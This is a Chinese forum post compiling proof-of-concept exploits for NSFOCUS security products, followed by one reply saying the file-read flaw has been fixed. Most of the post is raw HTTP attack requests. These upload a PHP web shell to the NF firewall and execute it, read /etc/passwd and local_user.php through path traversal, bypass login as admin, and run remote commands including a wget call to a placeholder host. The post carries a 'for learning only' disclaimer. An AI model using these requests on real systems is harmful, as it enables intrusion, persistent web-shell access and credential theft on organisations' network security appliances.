吉沃运营专员 发表于 2023-8-16 21:54:03

绿盟漏洞 PoC 整理

本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!
绿盟 NF 下一代防火墙任意文件上传漏洞
POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
Host:
--4803b59d015026999b45993b1245f0ef
Content-Disposition: form-data; name="file"; filename="compose.php"
<?php eval($_POST['cmd']);?>
--4803b59d015026999b45993b1245f0ef--
POST /mail/include/header_main.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
Host:
cmd=phpinfo();
绿盟 sas 安全审计系统任意文件读取
/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd
GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
绿盟 SAS 堡垒机 Exec 远程命令执行漏洞
GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close
绿盟 SAS 堡垒机 GetFile 任意文件读取漏洞
通过漏洞包含 www/local_user.php 实现任意⽤户登录

/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd
绿盟 SAS 堡垒机 local_user.php 任意用户登录漏洞
/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin

xulongzhuiyi 发表于 2023-9-4 13:44:26

任意文件读取的漏洞,我们发现并已经改了
页: [1]
查看完整版本: 绿盟漏洞 PoC 整理